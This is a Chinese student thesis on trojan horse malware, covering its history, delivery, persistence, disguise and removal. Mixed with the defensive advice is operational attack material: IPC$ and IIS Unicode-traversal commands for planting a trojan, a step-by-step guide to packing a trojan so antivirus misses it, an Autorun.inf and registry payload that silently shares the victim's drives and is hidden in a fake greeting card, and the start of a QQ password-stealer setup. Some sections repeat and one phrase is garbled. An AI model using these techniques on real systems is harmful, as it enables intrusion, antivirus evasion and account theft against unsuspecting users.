木马攻击研究毕业论文毕业设计（论文）word格式.doc

序言 早期的防病毒思想并不盛行，那时候的网民也比较单纯，使用网络防火墙的人也只有少数，所以那时候的入侵者可以算是幸福的，他们只需要一点简单的社会工程学手段就能把木马程序传输给对方执行，这一时期的木马种植手段（如今的普遍称谓为“下马”）基本上不需要牵涉到技术，也许唯一需要的技术就是如何配置和使用一个木马，因为那时候木马也还是个新产物而已。那时候的网民，只能依靠自己的判断和技术，才能免受或摆脱木马之害。因此，当木马技术刚在国内开始的时候，任意一个IP段都有可能存在超过40%的受害计算机开放着大门等待入侵者进攻，可以毫不夸张的说，那时候是木马的第一黄金时期，唯一美中不足的制约条件就是当时的网络速度普遍太慢了。随着时间的流逝，木马技术发展日益成熟，但网民的安全意识也普遍提高，更出现了初期的病毒防火墙概念，这个时期的入侵者必须掌握更高级的社会工程学手段和初期的入侵技术才能让对方受害了，这时期的木马虽然隐蔽性有了相对提高，但仍然是基于客户端寻找连接服务器端的模式。由于出现了病毒防火墙，网民判断和查杀木马的效率大大提高，而且大部分人也知道“人心不古”了，不再轻易接收陌生人给的程序，使得木马不再像上时期那样肆无忌弹的横行，但是因为病毒防火墙是个新兴产物，仍然有相对多的人没有安装使用，以至于许多老旧的木马依然可以横行无忌。 再后来，随着网络防火墙技术诞生和病毒防火墙技术的成熟，木马作者被迫紧跟着防病毒厂商的脚步更新他们的作品以避免马儿过早“殉职”，同时由于网络防火墙技术的出现，让计算机与网络之间不再直接，尤其是网络防火墙实现的“拦截外部数据连接请求”与“审核内部程序访问网络请求”的策略，导致大部分木马纷纷失效，这时期的木马逐渐分裂成两个派别：一种依然采用客户端连接服务器端的方式，只是改为了其他传输途径，如E-MAIL、FTP等，或者在内部除掉网络防火墙，以便自己畅通无阻；另一种则改变了入侵的思维，把“客户端连接服务器端”变为“服务器端连接客户端”，再加上一点社会工程学技术，从而突破了网络防火墙的限制，也因此诞生了一种新的木马技术“反弹型”木马。这一时期里，入侵者与受害者之间的战争终于提升到技术级别，若想保护自己，除了安装网络防火墙和病毒防火墙，以及接触网络攻防技术以外别无他法，这个“基础互动”一直保持到今天的XP时代。到了XP时代，网络速度有了质的飞跃，黑客攻防战更是越来越多的浮上水面，因为系统变了，一个专门为网络应用而诞生的操作系统，必定会存在与网络有关的缺陷。没错，WinXP相对于Win9x的弱点就是它的网络漏洞太多了，无论是利用MIME漏洞传播的信件木马，还是通过LSASS溢出而放下的木马，都能在XP系统上分到一块肉。你也许会说，Win9x同样有许多漏洞，但是为什么它没有XP的烦恼？这是因为Win9x的网络功能太弱了，几乎没有什么系统组件需要依靠网络运行！所以现在的用户，除了使用网络防火墙和病毒防火墙把自己包裹得严严实实以外，还要三天两头去微软的系统更新站点安装各种漏洞修复程序  特洛伊木马造成的危害可能是非常惊人的，由于它具有远程控制机器以及捕获屏幕、键击、音频、视频的能力，所以其危害程度要远远超过普通的病毒和蠕虫。深入了解特洛伊木马的运行原理，在此基础上采取正确的防卫措施，只有这样才能有效减少特洛伊木马带来的危害。木马攻击研究目录摘要.1 关键词.1第一章 木马概述1.1什么是木马.11.2 木马的危害.11.3 释放木马的常规方法.11.4 症状.2第二章 木马植入技术  2.1 木马的植入.4  2.2 了解木马的加载方式.5  2.3 木马的自动运行.5第三章 木马的隐藏和伪装技术  3.1木马的伪装方式.6 3.2 常规伪装技术.7第四章 木马的攻击示例   4.1 入侵的方式.15   4.2 用自解压包入侵的方法.15  4.3 通过QQ木马入侵（例如盗取QQ号）.16  4.4  rootkit木马攻击原理.17第五章 木马的防范与清除  5.1 木马的清除.20  5.2 抵抗图片型木马的方法.20  5.3 木马万能查杀法.20第六章和 木马的种类同时与计算机病毒、蠕虫有什么区别6.1木马程序的种类.216.2计算机病毒、蠕虫有什么区别.23结  论.25致  谢.26参考文献.26摘要特洛伊木马（以下简称木马)，英文叫做“Trojan horse”，其名称取自希腊神话的特洛伊木马记。 古希腊传说，特洛伊王子帕里斯访问希腊，诱走了王后海伦，希腊人因此远征特洛伊。围攻9年后，到第10年，希腊将领奥德修斯献了一计，就是把一批勇士埋伏在一匹巨大的木马腹内，放在城外后，佯作退兵。特洛伊人以为敌兵已退，就把木马作为战利品搬入城中。到了夜间，埋伏在木马中的勇士跳出来，打开了城门，希腊将士一拥而入攻下了城池。后来，人们在写文章时就常用“特洛伊木马”这一典故，用来比喻在敌方营垒里埋下伏兵里应外合的活动盗密报卡解绑过程关键词电脑，病毒，木马，计算机病毒，计算机安全第一章 木马概述1.1什么是木马“木马”一词，已不再是新名称；木马的流行，已不再是新鲜的事儿；但是木马的危害，却始终是困扰众多使用者的根源；中了木马的计算机，可谓来无影，藏无踪； 轻则让用户计算机速度发生异常、网络速度变慢、甚至系统崩溃，重则往往让用户丢失游戏、银行帐户密码等等与个人息息相关的重要信息，不仅苦不堪言，还后悔莫及；种种恶果，种种恶行，种种懊悔，不仅木马传播者应承担一定责任，就连个人而言，或多或少也应该负点小小的责任；不良事件的发生，皆由我们太不了解木马所致；本文，旨在谈一下木马相关知识和研究，希望对阁下有所帮助！木马”程序是目前比较流行的病毒文件，与一般的病毒不同，它不会自我繁殖，也并不“刻意”地去感染其他文件，它通过将自身伪装吸引用户下载执行，向施种木马者提供打开被种者电脑的门户，使施种者可以任意毁坏、窃取被种者的文件，甚至远程操控被种者的电脑。“木马”与计算机网络中常常要用到的远程控制软件有些相似，但由于远程控制软件是“善意”的控制，因此通常不具有隐蔽性；“木马”则完全相反，木马要达到的是“偷窃”性的远程控制，如果没有很强的隐蔽性的话，那就是“毫无价值”的。 一个完整的“木马”程序包含了两部分：“服务器”和“控制器”。植入被种者电脑的是“服务器”部分，而所谓的“黑客”正是利用“控制器”进入运行了“服务器”的电脑。1.2 木马的危害相信木马对于大家来说不算陌生。它是一种远程控制工具，以简便、易行、有效而深受广大黑客青睐。一台电脑一旦中上木马，它就变成了一台傀儡机，对方可以在你的电脑上上传下载文件，偷窥你的私人文件，偷取你的各种密码及口令信息中了木马你的一切秘密都将暴露在别人面前，隐私？不复存在！ （木马在黑客入侵中也是一种不可缺少的工具。就在去年的10月28日，一个黑客入侵了美国微软的门户网站，而网站的一些内部信息则是被一种叫做QAZ的木马传出去的。就是这小小的QAZ让庞大的微软丢尽了颜面！） （大家比较熟悉的木马当数国产软件冰河了。冰河是由黄鑫开发的免费软件，冰河面世后，以它简单的操作方法和强大的控制能力令人胆寒，可以说是达到了谈“冰”色变的地步。）1.3 释放木马的常规方法(1)传播方式: 木马的传播方式主要有两种:一种是通过E-MAIL,控制端将木马程序以附件的形式夹在邮件中发送出 去, 收信人只要打开附件系统就会感染木马;另一种是软件下载，一些非正规的网站以提供软件下载为名义， 将木马捆绑在软件安装程序上，下载后，只要一运行这些程序，木马就会自动安装。(2)伪装方式: 鉴于木马的危害性,很多人对木马知识还是有一定了解的,这对木马的传播起了一定的抑制作用,这 是木马设计者所不愿见到的,因此他们开发了多种功能来伪装木马,以达到降低用户警觉,欺骗用户的目的。1.4 症状(1)修改图标 当你在E-MAIL的附件中看到这个图标时,是否会认为这是个文本文件呢?但是我不得不告 诉你,这也有可能是个木马程序,现在 已经有木马可以将木马服务端程序的图标改成HTML,TXT, ZIP等各种文件的图标,这有相当大的迷惑性,但是目前提供这种功能的木马还不多见,并且这种伪装也不是无懈可击的,所以不必整天提心吊胆,疑神疑鬼的。 (2)捆绑文件 这种伪装手段是将木马捆绑到一个安装程序上,当安装程序运行时,木马在用户毫无察觉的情况下,偷偷的进入了系统。至于被捆绑的文件一般是可执行文件(EXE,COM一类的文件)。 (3)出错显示 有一定木马知识的人都知道,如果打开一个文件,没有任何反应,这很可能就是个木马程序, 木马的设计者也意识到了这个缺陷,所以已经有木马提供了一个叫做出错显示的功能。当服务 端用户打开木马程序时,会弹出一个如下图所示的错误提示框(这当然是假的),错误内容可自由 定义,大多会定制成一些诸如“文件已破坏，无法打开的！”之类的信息，当服务端用户信以为真时,木马却悄悄侵入了 系统。 (4)定制端口 很多老式的木马端口都是固定的,这给判断是否感染了木马带来了方便,只要查一下特定的 端口就 知道感染了什么木马,所以现在很多新式的木马都加入了定制端口的功能,控制端用户可 以在1024-65535之间任选一个端口作为木马端口(一般不选1024以下的端口)，这样就给判断 所感染木马类型带来了麻烦。 (5)自我销毁 这项功能是为了弥补木马的一个缺陷。我们知道当服务端用户打开含有木马的文件后，木马 会将自己拷贝到WINDOWS的系统文件夹中(C:WINDOWS或C:WINDOWSSYSTEM目录下)，一般来说原木马文件 和系统文件夹中的木马文件的大小是一样的(捆绑文件的木马除外),那么中了木马的朋友只要在近来 收到的信件和下载的软件中找到原木马文件,然后根据原木马的大小去系统文件夹找相同大小的文件, 判断一下哪个是木马就行了。而木马的自我销毁功能是指安装完木马后，原木马文件将自动销毁，这样服务端用户就很难找到木马的来源，在没有查杀木马的工 具帮助下，就很难删除木马了。 (6)木马更名 安装到系统文件夹中的木马的文件名一般是固定的，那么只要根据一些查杀木马的文章,按 图索骥在系统文件夹查找特定的文件,就可以断定中了什么木马。所以现在有很多木马都允许控 制端用户自由定制安装后的木马文件名，这样很难判断所感染的木马类型了。第二章 木马植入技术2.1 木马的植入通过网上邻居(即共享入侵)要求:对方打开139端口且有共享的可写目录.用法:直接将木马放入即可.通过IPC$要求:双方均需打开IPC$且需要有对方的一个普通用户的帐号(具有写权限)用法:先用NET命令连上对方电脑 net use IPIPC$ "密码" /user:用户名再用COPY命令将木马复制到对方电脑net copy本地木马路径 远程木马路径+木马名字 通过网页植入要求:对方IE需要是IE未打补丁版本用法1:利用IE的IFRAME漏洞入侵.用法2:利用IE的DEBUG代码入侵.用法3:通过JS,VBS代码入侵用法4:通过ActiveX或Java程序入侵.通过OE入侵.要求:对方OE未打补丁.用法:与中的用法1,3,4相同.通过WORD/EXCEL/ACCESS入侵要求:对方未对宏的运行做限制.用法:编写恶意的宏，夹杂木马，一运行office文档便植入主机中.用法2:通过OFFICE的帮助文件漏洞入侵.通过Unicode漏洞入侵要求:对方有Unicode漏洞用法(举例): _blank>http:/x.x.x.x/scripts/.%c1%1c./winnt/system32/cmd.exe?+COPY+本地木马路径+远程路径+木马名通过FTP入侵要求:对方的FTP可以匿名登陆而且可写入用法:直接将木马传上去即可.通过TELNET入侵要求:具有对方的一个具有写权限的帐号用法:用TELNET命令将木马传上去.EXE合并木马要求:无(但用于合并木马的EXE文件体积应该尽量小,而且应该是比较熟悉的程序.)用法:用EXE文件合并器将两个EXE合并即可.winrar木马入侵要求:对方安装了Winrar用法:将压缩包设置为自解压格式,并设置自动运行的选项，再将RAR图标更改.文件夹惯性点击法要求:无用法:将一个木马伪装成文件夹的图标，再将其放于几层目录中.2.2 了解木马的加载方式加载方式：定位于System.ini和Win.ini文件System.ini(位置C:windows)boot项原始值配置：“shell=explorer.exe”，explorer.exe是Windows的核心文件之一，每次系统启动时，都会自动加载。boot项修改后配置：“shell=explorer C:windowsxxx.exe”(xxx.exe假设一木马程序)。Win.ini(位置C:windows) windows项原始值配置：“load=”；“run=”，一般情况下，等号后无启动加载项。windows项修改后配置：“load=”和“run=”后跟非系统、应用启动文件，而是一些你不熟悉的文件名。解决办法：执行“运行msconfig”命令，将System.ini文件和Win.ini文件中被修改的值改回原值，并将原木马程序删除。若不能进入系统，则在进入系统前按“Shift+F5”进入Command Prompt Only方式，分别键入命令edit system.ini和edit win.ini进行修改。加载方式：隐藏在注册表中(此方式最为隐蔽)。注意以下注册表项：HKEY LOCAL MACHINESoftwareclassesexefileshellopencommand原始数值数据："%1"%被修改后的数值数据：C:systemxxx.exe "%1"%原注册表项是运行可执行文件的格式，被修改后就变为每次运行可执行文件时都会先运行C:systemxxx.exe这个程序。例如：开机后运行QQ主程序时，该xxx.exe(木马程序)就先被加载了。解决办法：当通过防火墙得知某端口被监听，立即下线，检查注册表及系统文件是否被修改，找到木马程序，将其删除。所谓“病从口入”感染源还是在于加载了木马程序的服务器端。目前，伪装可执行文件图标的方法很多，如：修改扩展名，将文件图标改为文件夹的图标等，并隐藏扩展名，因此接收邮件和下载软件时一定要小心。许多木马程序的文件名很像系统文件名，造成用户对其没有把握，不敢随意删除，因此要不断增长自己的知识才可防备万一。2.3 木马的自动运行由自启动激活木马 自启动木马的条件,大致出现在下面6个地方: 1.注册表:打开HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersion下的五个以Run 和RunServices主键,在其中寻找可能是启动木马的键值。 2.WIN.INI:C:WINDOWS目录下有一个配置文件win.ini，用文本方式打开，在windows字段中有启动 命令 load=和run=,在一般情况下是空白的,如果有启动程序,可能是木马。 3.SYSTEM.INI:C:WINDOWS目录下有个配置文件system.ini，用文本方式打开，在386Enh,mci， drivers32中有命令行,在其中寻找木马的启动命令。 4.Autoexec.bat和Config.sys:在C盘根目录下的这两个文件也可以启动木马。但这种加载方式一般都 需要控制端用户与服务端建立连接后，将已添加木马启动命令的同名 文件上传 到服务端覆盖这两个文件才行。 5.*.INI:即应用程序的启动配置文件，控制端利用这些文件能启动程序的特点，将制作好的带有木马 启动命令的同名文件上传到服务端覆盖这同名文件，这样就可以达到启动木马的目的了。 6.启动菜单:在“开始-程序-启动”选项下也可能有木马的触发条件。 由触发式激活木马 1.注册表:打开HKEY_CLASSES_ROOT文件类型shellopencommand主键,查看其键值。举个例子,国产 木马“冰河”就是修改HKEY_CLASSES_ROOT xtfileshellopencommand下的键值,将“C :WINDOWS NOTEPAD.EXE %1”该为“C:WINDOWSSYSTEMSYXXXPLR.EXE %1”，这时你双 击一个TXT文件 后，原本应用NOTEPAD打开文件的，现在却变成启动木马程序了。还要说明 的是不光是TXT文件 ，通过修改HTML，EXE，ZIP等文件的启动命令的键值都可以启动木马 ，不同之处只在于“文件类型”这个主键的差别，TXT是txtfile,ZIP是WINZIP，大家可以 试着去找一下。 2.捆绑文件:实现这种触发条件首先要控制端和服务端已通过木马建立连接，然后控制端用户用工具 软件将木马文件和某一应用程序捆绑在一起，然后上传到服务端覆盖原文件，这样即使 木马被删 除了，只要运行捆绑了木马的应用程序，木马又会被安装上去了。 3.自动播放式:自动播放本是用于光盘的，当插入一个电影光盘到光驱时，系统会自动播放里面的内容，这就是自动播放的本意，播放什么是由光盘中的AutoRun.inf文件指定的，修改AutoRun.inf中的open一行可以指定在自动播放过程中运行的程序。后来有人用于了硬盘与U盘，在U盘或硬盘的分区，创建Autorun.inf文件，并在Open中指定木马程序，这样，当你打开硬盘分区或U盘时，就会触发木马程序的运行。木马作者还在不断寻找“可乘之机”这里只是举例，又有不断的自启动的地方被挖掘出来。第三章 木马的隐藏和伪装技术3.1木马的伪装方式鉴于木马的危害性,很多人对木马知识还是有一定了解的,这对木马的传播起了一定的抑制作用,这是木马设计者所不愿见到的,因此他们开发了多种功能来伪装木马,以达到降低用户警觉,欺骗用户的目的。 (一)修改图标 当你在E-MAIL的附件中看到这个图标时,是否会认为这是个文本文件呢?但是我不得不告 诉你,这也有可能是个木马程序,现在 已经有木马可以将木马服务端程序的图标改成HTML,TXT, ZIP等各种文件的图标,这有相当大的迷 惑性,但是目前提供这种功能的木马还不多见,并且这种 伪装也不是无懈可击的,所以不必整天提心吊胆,疑神疑鬼的。 (二)捆绑文件 这种伪装手段是将木马捆绑到一个安装程序上,当安装程序运行时,木马在用户毫无察觉的 情况下 ,偷偷的进入了系统。至于被捆绑的文件一般是可执行文件(即EXE,COM一类的文件)。 (三)出错显示 有一定木马知识的人都知道,如果打开一个文件,没有任何反应,这很可能就是个木马程序, 木马的 设计者也意识到了这个缺陷,所以已经有木马提供了一个叫做出错显示的功能。当服务 端用户打开木 马程序时,会弹出一个如下图所示的错误提示框(这当然是假的),错误内容可自由 定义,大多会定制成 一些诸如“文件已破坏，无法打开的！”之类的信息，当服务端用户信以 为真时,木马却悄悄侵入了 系统。 (四)定制端口 很多老式的木马端口都是固定的,这给判断是否感染了木马带来了方便,只要查一下特定的 端口就 知道感染了什么木马,所以现在很多新式的木马都加入了定制端口的功能,控制端用户可 以在1024-65535之间任选一个端口作为木马端口(一般不选1024以下的端口)，这样就给判断 所感染木马类型带 来了麻烦。 (五)自我销毁 这项功能是为了弥补木马的一个缺陷。我们知道当服务端用户打开含有木马的文件后，木马 会将自己拷贝到WINDOWS的系统文件夹中(C:WINDOWS或C:WINDOWSSYSTEM目录下)，一般来说 原木马文件 和系统文件夹中的木马文件的大小是一样的(捆绑文件的木马除外),那么中了木马 的朋友只要在近来 收到的信件和下载的软件中找到原木马文件,然后根据原木马的大小去系统 文件夹找相同大小的文件, 判断一下哪个是木马就行了。而木马的自我销毁功能是指安装完木 马后，原木马文件将自动销毁，这 样服务端用户就很难找到木马的来源，在没有查杀木马的工 具帮助下，就很难删除木马了。 (六)木马更名 安装到系统文件夹中的木马的文件名一般是固定的，那么只要根据一些查杀木马的文章,按 图索骥在系统文件夹查找特定的文件,就可以断定中了什么木马。所以现在有很多木马都允许控 制端用户自由定制安装后的木马文件名，这样很难判断所感染的木马类型了。 3.2最新伪装技术有什么办法可以为木马掩去锋芒，避过杀毒软件的查杀呢？当然还是手动加壳！不过我们不会再用ASPACK或是UPX这些加壳软件，因为它们是最常用的，但同时也是失效最快的，所以我们要用一些另类不常见的加壳软件来为木马加壳，让最新的杀毒软件都无法识别出木马来。下面就跟我来挑战杀毒软件，品尝自己加密木马的过程吧。一、 幻影加壳，可障法眼二、 “幻影”加壳软件是一个为 Windows 下的EXE,DLL,OCX.32位可运行文件加密系统。软件下载地址是：http:/www.3800cc.com/soft/2582.htm。本来是作为软件程序员为自己的软件设置版权保护的，不过在偶看来，为木马加密才是它最有前途的应用：）现在我们就利用它来为木马加上一层坚硬的保护壳。在为木马客户端进行加壳前，首先要确保木马还没有被加过壳，如果木马已加过壳但依然被杀毒软件查杀，那么要先对木马进行脱壳，再用幻影进行加壳。这里假设已存在一个解壳过的木马端“TheefServer.exe”，用趋势杀毒软件对其检测，出现如图1所示的病毒报警提示。现在我们用幻影来对它加壳。三、 图1小提示：侦测木马原来是否加过壳并进行脱壳，可以使用Peid、UPX、Aspack之类的软件，至于如何操作，在这里就不作过多的叙述了，以前的网友世界里已经介绍过很多了。运行幻影可以看到软件使用界面很简单，在“加密程序”中浏览选择刚才的“TheefServer.exe”文件，然后点击工具栏上的“加密”按钮（如图2），幻影就开始先对木马端备份，将原来的文件更名为“TheefServer.exe_bak”，然后再进行程序压缩加密，很快就完成了加壳工作。图2 现在我们再用杀毒软件检测一下新生成的“TheefServer.exe”文件，可以看到杀毒软件已经无法检测发出病毒报警了。木马已经顺利骗过了杀毒软件（如图3）。怎么样，很简单的就让杀毒软件失效了吧？图3二、YC保护专家，为木马提供保护“YC保护专家”也是一个程序保护工具，是防止软件被Softice等工具调试破解的，用它来为木马加壳，也有违开发者本意，不过顾不了那么多了，看看它对木马的保护是多强的吧？还是以刚才的“TheefServer.exe”木马文件为例，运行YC保护专家，浏览选择木马客户端，在保护选项中勾选如下几个选项“如果修改资源则损坏或退出”、“删除PE文件头”、“删除引入信息”，其中最关键的是后两项（如图4）。设置完毕后点击“保护”按钮，很快木马文件头信息就发生了改变，其中的病毒特征码也自然发生变化，而杀毒软件也无法识别出新生成的木马文件了。图4 三、杀毒软件不识老外WWWPack32是一个国外的压缩加壳工具，采用的加壳方式与一般软件有所不同，因此用WWWPack32加过壳的木马很难被杀毒软件识别出来，并且我们可以自己设定压缩加壳的等级。运行WWWPack32后，首先选择需加壳的木马执行文件，在“Mask”中选择“PE Structure（EXE and DLL）”（如图5），然后点击工具栏上的“Setup”按钮，弹出压缩设置窗口，在“Commpression Method”中可设置压缩等级（如图6）。当然压缩的等级越高，花的时间越多，不过被杀毒软件查出的几率也越小。退出设置框，点击工具栏上的“Fileinfo”按钮，可以查看到木马程序中可被压缩的数据信息，以及在压缩后体积的变化（如图7）。 图5图6图7 一切设置完毕后，点击工具栏上的“Pack”按钮，即可对木马进行压缩加壳了，加过壳的木马同样不会被杀毒软件轻易识别出来。四、 病毒免疫器，让谁免疫？五、 “应用程序病毒免疫器”是一个特殊的程序保护工具，它本来是用来为程序加上一个病毒免疫头，保护程序不被病毒感染破坏的。不过笔者尝试用它来为木马病毒压缩加了个壳，却发现它对木马好像更是“保护关爱”，经它压缩过的木马居然不会被杀毒软件识别出来。运行程序后界面如图8所示，点击“系统设置”可对软件做一些设置，不过这里我们是用它保护木马，所以这些设置不做反而好些。点击下一步，在这里选择要加壳保护的木马程序，并设置处理方式为“普通用户方式”即可（如图9）。点击下一步，设置程序为自动修复（如图10）；在下一步可以设置一些程序修复时的提示信息，最后点击下一步完成木马程序的保护过程（如图11）。图8图9图10图11 经过以上的操作，一般的杀毒软件已无法准确判断出木马来，同时木马本身也具备了对杀毒软件的免疫功能。当特殊情况下，杀毒软件发现了木马并对其隔离时，会破坏其文件头数据，不过由于木马具备了自身恢复的功能，所以杀毒软件的隔离将对其失效，木马依然还是可以运行的。第四章 木马的攻击示例  4.1 入侵的方式木马被激活后，进入内存，并开启事先定义的木马端口，准备与控制端建立连接。这时服务端用 户可以在MS-DOS方式下，键入NETSTAT -AN查看端口状态，一般个人电脑在脱机状态下是不会有端口 开放的，如果有端口开放，你就要注意是否感染木马了。下面是电脑感染木马后，用NETSTAT命令查 看端口的两个实例： 其中是服务端与控制端建立连接时的显示状态，是服务端与控制端还未建立连接时的显示状态。 在上网过程中要下载软件，发送信件，网上聊天等必然打开一些端口，下面是一些常用的端口： (1)1-1024之间的端口：这些端口叫保留端口，是专给一些对外通讯的程序用的，如FTP使用21， SMTP使用25，POP3使用110等。只有很少木马会用保留端口作为木马端口 的。 (2)1025以上的连续端口：在上网浏览网站时，浏览器会打开多个连续的端口下载文字，图片到本地 硬盘上，这些端口都是1025以上的连续端口。 (3)4000端口：这是OICQ的通讯端口。 (4)6667端口：这是IRC的通讯端口。 除上述的端口基本可以排除在外，如发现还有其它端口打开，尤其是数值比较大的端口，那就要怀疑 是否感染了木马，当然如果木马有定制端口的功能，那任何端口都有可能是木马端口。4.2 用自解压包入侵的方法如果捆绑一个木马给别人，只要稍有常识的人有杀毒软件就可以识破。如果不用木马，用些批处理炸弹、碎片对象文件、或自导入注册表文件，就可以实现各种攻击。 把以下两行保存为Autorun.infAutorunopen=regedit /s Autorun.reg把以下一段保存为Autorun.regREGEDIT4HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionNetworkLanmanc$"Path"="c:""Remark"="""Type"=dword:00000000"Flags"=dword:00000192"Parm1enc"=hex:"Parm2enc"=hex:HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionNetworkLanmanD$"Path"="D:""Remark"="""Type"=dword:00000000"Flags"=dword:00000192"Parm1enc"=hex:"Parm2enc"=hex:HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionNetworkLanmanE$"Path"="E:""Remark"="""Type"=dword:00000000"Flags"=dword:00000192"Parm1enc"=hex:"Parm2enc"=hex:HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionNetworkLanmanF$"Path"="F:""Remark"="""Type"=dword:00000000"Flags"=dword:00000192"Parm1enc"=hex:"Parm2enc"=hex: 比如在当今电子贺卡漫天飞的时代，可以把你的自解压包命名为“牛年贺卡”，包里包个真贺卡，顺便把以上两个文件打包进去，注意要指定文件解包路径。当收贺卡人点击自解压包时真贺卡被解压的同时，两个文件就悄悄的被解到指定位置。Autorun.inf必须解到某一分区的根目录，名字不能变，可以设置文件隐藏属性。Autorun.reg文件名和释放目录可以任意，可以更好的隐藏，注意Autorun.inf指向目录正确的地方。当受害人双击有Autorun.inf的分区时，他的硬盘C、D、E、F分区就被打开公享。4.3 通过QQ木马入侵（例如盗取QQ号）很多朋友都有过QQ号被盗的经历，即使用“密码保护”功能找回来后，里面的Q币也已经被盗号者洗劫一空，碰到更恶毒的盗号者，还会将你的好友统统删除，朋友们将会永远得离开你。想过反击吗？什么，反击？别开玩笑了，我们只是菜鸟，不是黑客，我们只会看看网页，聊聊天，连QQ号是怎么被盗的都不知道，还能把盗号者怎么样呢？其实喜欢盗号的所谓“黑客”们，也只是利用了一些现成的盗号工具，只要我们了解了QQ号被盗的过程，就能作出相应防范，甚至由守转攻，给盗号者以致命一击。 一、知己知彼，盗号技术不再神秘 如今，还在持续更新的QQ盗号软件已经所剩无几，其中最为著名，流传最广的则非“啊拉QQ大盗”莫属，目前绝大多数的QQ号被盗事件都是由这个软件引起的。软件的使用条件很简单，只要你有一个支持smtp发信的邮箱或者一个支持asp脚本的网页空间即可。而且该木马可以将盗取的QQ号自动分为靓号和非靓号两种，并将它们分别发送到不同的信箱中，这也是“啊拉QQ大盗”如此流行的原因之一。接下来，便让我们先来了解一下其工作原理，以便从中找到反击的良方。 1、选择盗号模式 下载“啊拉QQ大盗”，解压后有两个文件：alaqq.exe、爱永恒，爱保姆qq.asp.其中alaqq.exe是“啊拉QQ大盗”的配置程序，爱永恒，爱保姆qq.asp是使用“网站收信”模式时需使用的文件。正式使用之前，还需要设置其参数。 “邮箱收信”配置：运行alaqq.exe，出现程序的配置界面。在“发信模式选择”选项中选中“邮箱收信”，在“邮箱收信”填写电子邮箱地址（建议使用程序默认的163.com网易的邮箱）。这里以邮箱n12345163.com（密码n_12345）为例来介绍“邮箱收信”模式时的配置，